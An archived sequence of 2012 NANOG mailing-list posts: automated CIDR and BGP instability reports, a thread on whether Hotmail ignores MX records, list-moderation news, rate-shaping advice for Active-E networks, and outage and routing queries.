- Hameltronics, LLC 74.91.48.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.49.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.50.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.51.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.52.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.53.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.54.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.55.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.56.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.57.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.58.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.59.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.60.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.61.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.62.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.91.63.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC 74.112.96.0/22 AS2828 XO-AS15 - XO Communications 74.115.124.0/23 AS46540 74.115.126.0/24 AS11260 EASTLINK-HSI - EastLink 81.22.64.0/20 AS5511 OPENTRANSIT France Telecom S.A. 82.101.160.0/19 AS5511 OPENTRANSIT France Telecom S.A. 100.104.0.0/13 AS286 KPN KPN Internet Backbone 100.112.0.0/14 AS286 KPN KPN Internet Backbone 100.116.0.0/15 AS286 KPN KPN Internet Backbone 110.34.44.0/22 AS12653 COMTONET KB Impuls Hellas S.A. 116.206.72.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.85.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 116.206.103.0/24 AS6461 MFNX MFN - Metromedia Fiber Network 117.120.56.0/21 AS4755 TATACOMM-AS TATA Communications formerly VSNL is Leading ISP 121.46.0.0/16 AS4134 CHINANET-BACKBONE No.31,Jin-rong Street 142.54.0.0/19 AS23498 CDSI - Cogeco Data Services LP 172.14.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.15.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. 172.45.1.0/24 AS3356 LEVEL3 Level 3 Communications 172.102.0.0/22 AS4812 CHINANET-SH-AP China Telecom (Group) 172.116.0.0/24 AS7018 ATT-INTERNET4 - AT&T Services, Inc. 172.120.16.0/21 AS19891 BML-AS Bill Me Later, Inc 176.123.128.0/19 AS45054 DI-NET-AS Di-Net LLC 192.0.0.0/24 AS14745 INTERNAP-BLOCK-4 - Internap Network Services Corporation 195.35.108.0/23 AS8881 VERSATEL Versatel Deutschland GmbH 198.18.0.0/15 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 198.51.100.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 200.1.112.0/24 AS29754 GO2TEL GO2TEL.COM INC. 200.6.49.0/24 AS23148 TERREMARK Terremark 200.24.73.0/24 AS26061 Equant Colombia 200.53.0.0/19 AS13878 Diveo do Brasil Telecomunicacoes Ltda 200.58.248.0/21 AS27849 200.75.184.0/21 AS14754 Telgua 200.106.128.0/20 AS3257 TINET-BACKBONE Tinet SpA 200.115.112.0/20 AS3257 TINET-BACKBONE Tinet SpA 202.1.224.0/24 AS10097 FLOWCOM Flow Communications 2/541 Kent St Sydney NSW 2000 202.8.106.0/24 AS9530 SHINSEGAE-AS SHINSEGAE I&C Co., Ltd. 202.58.113.0/24 AS19161 202.83.120.0/21 AS37972 202.83.124.0/24 AS37972 202.83.125.0/24 AS37972 202.83.126.0/24 AS37972 202.94.1.0/24 AS4808 CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network 202.140.128.0/19 AS9583 SIFY-AS-IN Sify Limited 202.174.125.0/24 AS9498 BBIL-AP BHARTI Airtel Ltd. 202.176.1.0/24 AS9942 COMINDICO-AP SOUL Converged Communications Australia 202.179.134.0/24 AS23966 LDN-AS-PK LINKdotNET Telecom Limited 203.0.113.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation 203.23.1.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.24.38.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.30.127.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/23 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.86.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.87.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications 203.32.188.0/24 AS1221 ASN-TELSTRA Telstra Pty Ltd 203.142.219.0/24 AS45149 204.9.116.0/22 AS30097 NUWAVE - NuWave 204.10.88.0/21 AS3356 LEVEL3 Level 3 Communications 204.10.92.0/23 AS30097 NUWAVE - NuWave 204.10.94.0/23 AS30097 NUWAVE - NuWave 204.14.0.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.0.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.2.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 204.14.3.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 205.175.214.0/24 AS5583 ORANGE-BUSINESS-SERVICES-BENELUX France Telecom S.A. 206.197.184.0/24 AS23304 DATOTEL-STL-AS - Datotel LLC, a NetLabs LLC Company 207.174.131.0/24 AS26116 INDRA - Indra's Net Inc 207.174.132.0/23 AS26116 INDRA - Indra's Net Inc 207.174.152.0/23 AS26116 INDRA - Indra's Net Inc 207.174.154.0/24 AS26116 INDRA - Indra's Net Inc 207.174.155.0/24 AS26116 INDRA - Indra's Net Inc 207.174.200.0/24 AS22658 EARTHNET - Earthnet, Inc. 207.174.248.0/21 AS6653 PRIVATEI - privateI, LLC 207.231.96.0/19 AS11194 NUNETPA - NuNet Inc. 208.83.53.0/24 AS40569 YGOMI-AS - Ygomi LLC 208.93.144.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 208.93.151.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation 209.148.64.0/19 AS13773 TELNETCOMM - Telnet Communications 209.177.64.0/20 AS6461 MFNX MFN - Metromedia Fiber Network 209.213.0.0/20 AS33005 ELTOPIA - Eltopia.com, LLC 213.150.202.0/24 AS8513 SKYVISION SkyVision Global Networks Ltd 213.150.204.0/24 AS29338 AFOL-AS Used by Africaonline Operations 216.12.160.0/20 AS26627 AS-PILOSOFT - Pilosoft, Inc. 216.21.160.0/20 AS27876 American Data Networks 216.146.0.0/19 AS11915 TELWEST-NETWORK-SVCS-STATIC - TEL WEST COMMUNICATIONS LLC 216.194.160.0/20 AS27876 American Data Networks Please see http://www.cidr-report.org for the full report ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From cidr-report at potaroo.net Fri Jul 27 17:00:01 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 27 Jul 2012 22:00:01 GMT Subject: BGP Update Report Message-ID: <201207272200.q6RM01FE071693@wattle.apnic.net> BGP Update Report Interval: 21-Jul-12 -to- 26-Jul-12 (5 days) Observation Point: BGP Peering with AS131072 TOP 20 Unstable Origin AS Rank ASN Upds % Upds/Pfx AS-Name 1 - AS1637 39517 1.6% 365.9 -- DNIC-AS-01637 - Headquarters, USAISC 2 - AS17813 36407 1.4% 267.7 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 3 - AS8402 36092 1.4% 20.4 -- CORBINA-AS OJSC "Vimpelcom" 4 - AS47931 25100 1.0% 204.1 -- ALENETWORK A.L.E. COM NETWORK S.R.L 5 - AS9829 24636 1.0% 18.9 -- BSNL-NIB National Internet Backbone 6 - AS24560 23244 0.9% 22.4 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 7 - AS7029 18201 0.7% 5.1 -- WINDSTREAM - Windstream Communications Inc 8 - AS7552 15306 0.6% 13.5 -- VIETEL-AS-AP Vietel Corporation 9 - AS13118 14259 0.6% 297.1 -- ASN-YARTELECOM OJSC Rostelecom 10 - AS28573 13041 0.5% 6.3 -- NET Servicos de Comunicao S.A. 11 - AS6458 12662 0.5% 14.3 -- Telgua 12 - AS27738 11509 0.5% 20.7 -- Ecuadortelecom S.A. 13 - AS48277 11273 0.5% 201.3 -- SOREX SOREX MEDIA S.R.L. 14 - AS49074 10768 0.4% 219.8 -- TECHNOLOGICAL SC TECHNOLOGICAL SRL 15 - AS13979 10640 0.4% 3.4 -- ATT-IPFR - AT&T Services, Inc. 16 - AS6389 10419 0.4% 3.1 -- BELLSOUTH-NET-BLK - BellSouth.net Inc. 17 - AS5800 10203 0.4% 39.5 -- DNIC-ASBLK-05800-06055 - DoD Network Information Center 18 - AS18566 9878 0.4% 4.7 -- COVAD - Covad Communications Co. 19 - AS10620 9731 0.4% 4.8 -- Telmex Colombia S.A. 20 - AS8151 9158 0.4% 6.1 -- Uninet S.A. de C.V. TOP 20 Unstable Origin AS (Updates per announced prefix) Rank ASN Upds % Upds/Pfx AS-Name 1 - AS16535 4402 0.2% 1467.3 -- ECHOS-3 - Echostar Holding Purchasing Corporation 2 - AS44410 3241 0.1% 1080.3 -- ENTEKHAB-AS ENTEKHAB INDUSTRIAL GROUP 3 - AS49072 921 0.0% 921.0 -- APSUARA-AS TCA Apsuara Ltd. 4 - AS43348 1752 0.1% 876.0 -- TATARINOVA-AS PE Tatarinova Alla Ivanovna 5 - AS54037 841 0.0% 841.0 -- CAREER-GROUP-INC - CAREER GROUP INC 6 - AS26184 703 0.0% 703.0 -- ASA-HQAS - American Society of Anesthesiologists 7 - AS14452 6312 0.2% 701.3 -- IOS-ASN - INTERNET OF THE SANDHILLS 8 - AS58655 1204 0.1% 602.0 -- SKYTEL6-BD SkyTel Communications Limited 9 - AS51250 583 0.0% 583.0 -- ITE-PROTON-AS "Information technologies enterprise "Proton" LTD 10 - AS38857 1082 0.0% 541.0 -- ESOFT-TRANSIT-AS-AP e.Soft Technologies Ltd. 11 - AS56588 442 0.0% 442.0 -- EE-IC Estonian Informatics Centre 12 - AS3 440 0.0% 759.0 -- YUPITER-AS Yu-Piter ltd. 13 - AS42806 428 0.0% 428.0 -- TELECOM-AS Telecom Georgia 14 - AS1637 39517 1.6% 365.9 -- DNIC-AS-01637 - Headquarters, USAISC 15 - AS29398 327 0.0% 327.0 -- PETROBALTIC "Petrobaltic" S.A. 16 - AS13118 14259 0.6% 297.1 -- ASN-YARTELECOM OJSC Rostelecom 17 - AS23007 888 0.0% 296.0 -- Universidad de Los Andes 18 - AS4 296 0.0% 51.0 -- COMUNICALO DE MEXICO S.A. DE C.V 19 - AS27890 576 0.0% 288.0 -- Universidad de Oriente 20 - AS57201 281 0.0% 281.0 -- EDF-AS Estonian Defence Forces TOP 20 Unstable Prefixes Rank Prefix Upds % Origin AS -- AS Name 1 - 109.161.64.0/19 13690 0.5% AS13118 -- ASN-YARTELECOM OJSC Rostelecom 2 - 59.176.0.0/14 7722 0.3% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 3 - 182.64.0.0/16 7432 0.3% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 4 - 122.161.0.0/16 7428 0.3% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 5 - 200.46.0.0/19 7057 0.3% AS21599 -- NETDIRECT S.A. 6 - 59.177.0.0/16 5820 0.2% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 7 - 67.47.194.0/23 4396 0.2% AS16535 -- ECHOS-3 - Echostar Holding Purchasing Corporation 8 - 202.56.215.0/24 4324 0.2% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services 9 - 59.177.0.0/18 4155 0.2% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 10 - 123.252.208.0/24 3922 0.1% AS17762 -- HTIL-TTML-IN-AP Tata Teleservices Maharashtra Ltd 11 - 59.177.48.0/20 3872 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 12 - 139.139.19.0/24 3828 0.1% AS1562 -- DNIC-ASBLK-01550-01601 - DoD Network Information Center 13 - 194.63.9.0/24 3636 0.1% AS1273 -- CW Cable and Wireless Worldwide plc 14 - 65.82.30.0/24 3007 0.1% AS6197 -- BATI-ATL - BellSouth Network Solutions, Inc 15 - 69.38.178.0/24 2960 0.1% AS19406 -- TWRS-MA - Towerstream I, Inc. 16 - 59.177.0.0/19 2234 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 17 - 115.170.128.0/17 2192 0.1% AS4847 -- CNIX-AP China Networks Inter-Exchange 18 - 59.177.64.0/18 2106 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 19 - 202.159.215.0/24 2006 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 20 - 59.177.144.0/20 2006 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. Details at http://bgpupdates.potaroo.net ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From dot at dotat.at Fri Jul 27 18:16:48 2012 From: dot at dotat.at (Tony Finch) Date: Sat, 28 Jul 2012 00:16:48 +0100 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: References: <20120726071441.GA11199@metron.com> Message-ID: <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> That would be a seriously broken violation of the SMTP specification. Tony. -- f.anthony.n.finch http://dotat.at/ On 26 Jul 2012, at 08:21, Suresh Ramasubramanian wrote: > If the MX records are not responsive / timing out, they might be falling > back to the A record. > > On Thu, Jul 26, 2012 at 12:44 PM, Lou Katz wrote: > >> One of my users has reported incoming mail failures, which I finally >> tracked down. It turned out that Hotmail has seen fit to send the mail >> to his domain's A record machine, despite the fact that he has valid MX >> records. >> >> The A record points to my webserver, which does not normally accept mail >> for anyone. The mail server MX records are to an entirely different >> machine. >> > > > > -- > Suresh Ramasubramanian (ops.lists at gmail.com) From mysidia at gmail.com Fri Jul 27 20:00:30 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Fri, 27 Jul 2012 20:00:30 -0500 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> References: <20120726071441.GA11199@metron.com> <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> Message-ID: On 7/27/12, Tony Finch wrote: > That would be a seriously broken violation of the SMTP specification. I would definitely agree it would be quite broken behavior, but you know, I never said Hotmail's processing wasn't broken -- only that they seem to honor MX records in the common case. If you are doing something unusual like "mail MX bla bla" I would say you can't rule that out as a possible cause, just because some RFC suggests it should be OK. The spec does say that you're not allowed to chain MX records. But i'm not so sure that the specification actually prohibits a SMTP server from doing that, if someone does try to chain MX records. it may also be out of spec to have a "MX" record point to a dns label that a MX record exists for in the first place. > Tony. > -- > f.anthony.n.finch http://dotat.at/ -- -JH From dmiller at tiggee.com Fri Jul 27 20:40:18 2012 From: dmiller at tiggee.com (David Miller) Date: Fri, 27 Jul 2012 21:40:18 -0400 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: References: <20120726071441.GA11199@metron.com> <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> Message-ID: <50134302.2010800@tiggee.com> On 7/27/2012 9:00 PM, Jimmy Hess wrote: > On 7/27/12, Tony Finch wrote: >> That would be a seriously broken violation of the SMTP specification. > I would definitely agree it would be quite broken behavior, but you > know, I never said Hotmail's processing wasn't broken -- only that > they seem to honor MX records in the common case. If you are doing > something unusual like "mail MX bla bla" > > I would say you can't rule that out as a possible cause, just because > some RFC suggests it should be OK. > > The spec does say that you're not allowed to chain MX records. But > i'm not so sure that the specification actually prohibits a SMTP > server from doing that, if someone > does try to chain MX records. > > it may also be out of spec to have a "MX" record point to a > dns label that a MX record exists for in the first place. MX records don't "chain". If they did, then example.com. 1800 IN MX 10 example.com. would be an infinite loop. This isn't an infinite loop and is instead a perfectly valid configuration. If you made a DNS query for the MX records for example.com you would get back an answer that might include: ;; ANSWER SECTION: example.com. 1800 IN MX 10 example.com. ;; ADDITIONAL SECTION: example.com. 1800 IN A 10.10.10.10 >From RFC 1035: 3.3.9. MX RDATA format +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ | PREFERENCE | +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ / EXCHANGE / / / +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ where: PREFERENCE A 16 bit integer which specifies the preference given to this RR among others at the same owner. Lower values are preferred. EXCHANGE A which specifies a host willing to act as a mail exchange for the owner name. MX records cause type A additional section processing for the host specified by EXCHANGE. The use of MX RRs is explained in detail in [RFC-974]. -DMM From mjwise at kapu.net Fri Jul 27 21:30:40 2012 From: mjwise at kapu.net (Michael J Wise) Date: Fri, 27 Jul 2012 19:30:40 -0700 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <50134302.2010800@tiggee.com> References: <20120726071441.GA11199@metron.com> <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> <50134302.2010800@tiggee.com> Message-ID: <25F0B21A-0319-45E3-9DBF-9906CB77AC6C@kapu.net> On Jul 27, 2012, at 6:40 PM, David Miller wrote: > MX records don't "chain". But they do, "Expand". And I can think of a way whereby if an MX record referenced itself, *AND* included something extra ? (did you see the something extra?) That it would be possible (and I'm not saying this is what is happening, but ? it could be) ? That an internal process could go resolving MX records, and adds them all to an internal table, until it figures it's got 'em all? "Gotta Get 'Em All!" ? and maybe, just maybe ? it exhausts the table space, and gives up, and tries the A record. I'm not saying this would be "Standard". I'm not saying this is the best, or perhaps even an acceptable way to do it. Or that it is in fact what is happening. But the config looked weird, and I can imagine ? a system being written as described ? and breaking just this way given that MX configuration. I can imagine Test ? not catching it. Aloha, Michael. -- "Please have your Internet License and Usenet Registration handy..." From jlewis at lewis.org Fri Jul 27 22:31:24 2012 From: jlewis at lewis.org (Jon Lewis) Date: Fri, 27 Jul 2012 23:31:24 -0400 (EDT) Subject: Dreamhost in the house? Message-ID: If anyone from Dreamhost participates here, I'd like to talk about an apparent routing issue you may have with reaching anything originating in AS6364. Specifically, I'm able to reach IPs in 208.113.240.0/24 from off-net (outside AS6364) machines, and from a customer owned CIDR to which we provide transit, but not from any of our CIDRs. ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From marka at isc.org Fri Jul 27 22:47:13 2012 From: marka at isc.org (Mark Andrews) Date: Sat, 28 Jul 2012 13:47:13 +1000 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: Your message of "Fri, 27 Jul 2012 19:30:40 MST." <25F0B21A-0319-45E3-9DBF-9906CB77AC6C@kapu.net> References: <20120726071441.GA11199@metron.com> <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> <50134302.2010800@tiggee.com> <25F0B21A-0319-45E3-9DBF-9906CB77AC6C@kapu.net> Message-ID: <20120728034714.9AB1B2319025@drugs.dv.isc.org> In message <25F0B21A-0319-45E3-9DBF-9906CB77AC6C at kapu.net>, Michael J Wise writ es: > > On Jul 27, 2012, at 6:40 PM, David Miller wrote: > > > MX records don't "chain". > > But they do, "Expand". > And I can think of a way whereby if an MX record referenced itself, = > *AND* included something extra =85 (did you see the something extra?) > > That it would be possible (and I'm not saying this is what is happening, = > but =85 it could be) =85 > That an internal process could go resolving MX records, and adds them = > all to an internal table, until it figures it's got 'em all=85 > > "Gotta Get 'Em All!" > > =85 and maybe, just maybe =85 it exhausts the table space, and gives up, = > and tries the A record. > > I'm not saying this would be "Standard". It would be broken. MX records say which machines are set up to receive email for a domain. Delivering it elsewhere, unless explicitly overridden (e.g. smarthost), is a security flaw in the MTA. > I'm not saying this is the best, or perhaps even an acceptable way to do = > it. > Or that it is in fact what is happening. > > But the config looked weird, and I can imagine =85 a system being = > written as described =85 and breaking just this way given that MX = > configuration. > I can imagine Test =85 not catching it. > > Aloha, > Michael. > --=20 > "Please have your Internet License =20 > and Usenet Registration handy..." > > -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From mjwise at kapu.net Fri Jul 27 23:45:39 2012 From: mjwise at kapu.net (Michael J Wise) Date: Fri, 27 Jul 2012 21:45:39 -0700 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120728034714.9AB1B2319025@drugs.dv.isc.org> References: <20120726071441.GA11199@metron.com> <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> <50134302.2010800@tiggee.com> <25F0B21A-0319-45E3-9DBF-9906CB77AC6C@kapu.net> <20120728034714.9AB1B2319025@drugs.dv.isc.org> Message-ID: <114E6E78-521D-4822-AFCC-BDC7C10CA6CA@kapu.net> On Jul 27, 2012, at 8:47 PM, Mark Andrews wrote: > In message <25F0B21A-0319-45E3-9DBF-9906CB77AC6C at kapu.net>, Michael J Wise writ > es: >> >> On Jul 27, 2012, at 6:40 PM, David Miller wrote: >> >>> MX records don't "chain". >> >> But they do, "Expand". >> And I can think of a way whereby if an MX record referenced itself, = >> *AND* included something extra =85 (did you see the something extra?) >> >> That it would be possible (and I'm not saying this is what is happening, = >> but =85 it could be) =85 >> That an internal process could go resolving MX records, and adds them = >> all to an internal table, until it figures it's got 'em all=85 >> >> "Gotta Get 'Em All!" >> >> =85 and maybe, just maybe =85 it exhausts the table space, and gives up, = >> and tries the A record. >> >> I'm not saying this would be "Standard". > > It would be broken. I'm not disputing it. I'm also not saying it is, or it isn't, because I don't know. What I am saying is, what I do know is, that you probably can't open a Sev A DCR ticket with HotMail, and neither can I. That, and ? it would seem there may be two things broken. And that fixing the MX "recursion" may re-cloak the apparent bug in HotMail. Maybe. Which one can be fixed faster? Aloha, Michael. -- "Please have your Internet License and Usenet Registration handy..." From grizz at dipd.com Sat Jul 28 16:36:36 2012 From: grizz at dipd.com (Matt Griswold) Date: Sat, 28 Jul 2012 16:36:36 -0500 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts Message-ID: <20120728163636.49bf4f44@segv> As a quick update, we've implemented some list settings last week to help to keep spam off the list. New subscribers are moderated until we're comfortable with their posts. We rejected the idea of keyword based message filtering since not only is a lot of work to maintain, it's trivial to get around it if you really want to post banned words. Comments and suggestions are welcome. Matt Griswold, on behalf of the NANOG Communications Committee From mark.tinka at seacom.mu Sun Jul 29 09:12:03 2012 From: mark.tinka at seacom.mu (Mark Tinka) Date: Sun, 29 Jul 2012 16:12:03 +0200 Subject: Rate shaping in Active E FTTx networks Message-ID: <201207291612.04112.mark.tinka@seacom.mu> On Thursday, July 26, 2012 09:45:14 PM Jason Lixfeld wrote: > Is that a lot to ask for one box? The ridiculously deep > buffers required in order to shape to PIR vs. police to > it (because policing to a PIR is just plain ugly) and > the requirements to perform any sort of preferential > packet treatment above and beyond that seem like quite a > lot to ask of one box. Am I wrong? Having used middleware in the past to do bandwidth management, this doesn't scale well when your network grows, and when off-net traffic (including that between your own customers) is coming in from several points in the backbone. On smaller networks, having middleware is easy because your exit points are finite and fairly static. When you grow and start peering, taking on several large customers that want to talk to each other across your network, middleware becomes cumbersome to deploy, because then not only can't you assume that 80% of your traffic is HTTP, but you also can't assume that 80% of your traffic is toward your upstreams. Moreover, adding redundancy (as in multiple links between routers/switches) makes the situation worse, because middleware might not be as inclined, and arbitration of bandwidth management across multiple middleware devices to avoid accidentally over-provisioning to customers gets expensive and complex. I've since migrated to performing bandwidth management in the router gear itself. This is easy if you're using high- end kit (think Juniper M/MX/T, Cisco ASR1000/9000), but significantly less so on wireline Metro-E networks (where your Active-E comes in). But not anymore - there have been meaningful developments in this area, and for some I've had the pleasure of deploying, e.g., Cisco's ME3600X/3800X. There also alternatives like Juniper's MX80 (too big, I think, but the smallest you can get from them now) and Brocade's NetIron CES/CER2000 units. These allow you to not only gain decent feature set in the Access, but also let you extend IP (and MPLS) into the edge too for additional simplicity. Hope this helps. Cheers Mark. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part. URL: From bill at herrin.us Sun Jul 29 20:46:44 2012 From: bill at herrin.us (William Herrin) Date: Sun, 29 Jul 2012 21:46:44 -0400 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120727024538.46BAF23125D1@drugs.dv.isc.org> References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> <20120727024538.46BAF23125D1@drugs.dv.isc.org> Message-ID: On Thu, Jul 26, 2012 at 10:45 PM, Mark Andrews wrote: > In message , Michael J Wise writ > es: >> And maybe an endless loop for an MX lookup might be what is causing = >> hotmail to panic and throw out the MX records. > > You don't lookup MX records for MX targets. This is basic MTA > processing. Correct. An MX record points to a label containing one or more address records. It does not chain. In principle the MX record could point to a CNAME record which then chains until it reaches an address record but I wouldn't depend on such a configuration working correctly. Ditto the MX lookup fetching a CNAME which chains until it reaches a label with an MX record. > You don't depend on ALL (ANY) returning MX records as they may not > be in the cache. You need to make a explict MX query you get no > MX records are returned in response to a ALL query. Also correct. > If the MX lookup fails, as apposed to returns nodata, you don't > lookup the A/AAAA records and synthesis a MX record. You treat it > as a soft error and queue for retry later. Again this is basic MTA > processing. Maybe. In principle this is correct but as you wander through various bits of software in the name lookup process (which often consults more than just the DNS -- even today DNS isn't the only game in town) it's pretty easy to lose track of the difference between lookup failure and success:no data. Think about it... how is the MTA to respond if the primary lookup reports success:no data (e.g. /etc/hosts) but a second tier lookup (e.g. DNS) reports lookup failure? What if DNS is third tier and the second tier is some kind of CIFS or NIS lookup which fails? Or reports success:no data. Or the DNS gets translated through a middleman (like NIS) which doesn't preserve the difference between fail and success no data. Does the whole lookup fail because part did? Gets ambiguous. Further, falling back to the address lookup in the absence of MX records is correct behavior for an MTA. What *should* happen here is that the guy's web server should reject the port 25 connection (an SMTP soft fail condition) and on the next retry hotmail should find the MX record and follow it. Either way, I think I'd have to consider this -advanced- MTA processing. You have to really know your stuff to get this one right. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From jamesl at mythostech.com Mon Jul 30 10:58:53 2012 From: jamesl at mythostech.com (James Laszko) Date: Mon, 30 Jul 2012 15:58:53 +0000 Subject: Global Crossing SJC Issues Message-ID: <8078ED370ADA824281219A7B5BADC39B1D833FCD@MBX023-W1-CA-5.exch023.domain.local> Does anyone have any information on a "network outage" with Global Crossing in the San Jose area? We've got hundreds of customers that use 8x8 VOIP services and they're all down. All the Global Crossing routes to 8x8 have vanished and the routes left are with Internap and don't appear to go anywhere... Curious if anyone has any information. Thanks! James Laszko Mythos Technology Inc jamesl at mythostech.com From marka at isc.org Mon Jul 30 12:03:30 2012 From: marka at isc.org (Mark Andrews) Date: Tue, 31 Jul 2012 03:03:30 +1000 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: Your message of "Sun, 29 Jul 2012 21:46:44 -0400." References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> <20120727024538.46BAF23125D1@drugs.dv.isc.org> Message-ID: <20120730170330.C039F23218DD@drugs.dv.isc.org> In message , William Herrin writes: > On Thu, Jul 26, 2012 at 10:45 PM, Mark Andrews wrote: > > In message , Michael J Wise writ > > es: > >> And maybe an endless loop for an MX lookup might be what is causing = > >> hotmail to panic and throw out the MX records. > > > > You don't lookup MX records for MX targets. This is basic MTA > > processing. > > Correct. An MX record points to a label containing one or more address > records. It does not chain. In principle the MX record could point to > a CNAME record which then chains until it reaches an address record > but I wouldn't depend on such a configuration working correctly. Ditto > the MX lookup fetching a CNAME which chains until it reaches a label > with an MX record. > > > You don't depend on ALL (ANY) returning MX records as they may not > > be in the cache. You need to make a explict MX query you get no > > MX records are returned in response to a ALL query. > > Also correct. > > > If the MX lookup fails, as apposed to returns nodata, you don't > > lookup the A/AAAA records and synthesis a MX record. You treat it > > as a soft error and queue for retry later. Again this is basic MTA > > processing. > > Maybe. In principle this is correct but as you wander through various > bits of software in the name lookup process (which often consults more > than just the DNS -- even today DNS isn't the only game in town) it's > pretty easy to lose track of the difference between lookup failure and > success:no data. But it is the only ones that returns MX records. If that step errors you need to retry later. If you get NXDOMAIN you go onto other address sources. > Think about it... how is the MTA to respond if the primary lookup > reports success:no data (e.g. /etc/hosts) but a second tier lookup > (e.g. DNS) reports lookup failure? What if DNS is third tier and the > second tier is some kind of CIFS or NIS lookup which fails? MX records can't be lookup up in /etc/hosts or in CIFS / NIS. You only look for address records *after* the MX lookup fails. > Or reports > success:no data. Or the DNS gets translated through a middleman (like > NIS) which doesn't preserve the difference between fail and success no > data. Does the whole lookup fail because part did? Gets ambiguous. > > Further, falling back to the address lookup in the absence of MX > records is correct behavior for an MTA. The key words above are "in the absence". Until you have determined that they are absent you don't fall back. > What *should* happen here is that the guy's web server should reject > the port 25 connection (an SMTP soft fail condition) and on the next > retry hotmail should find the MX record and follow 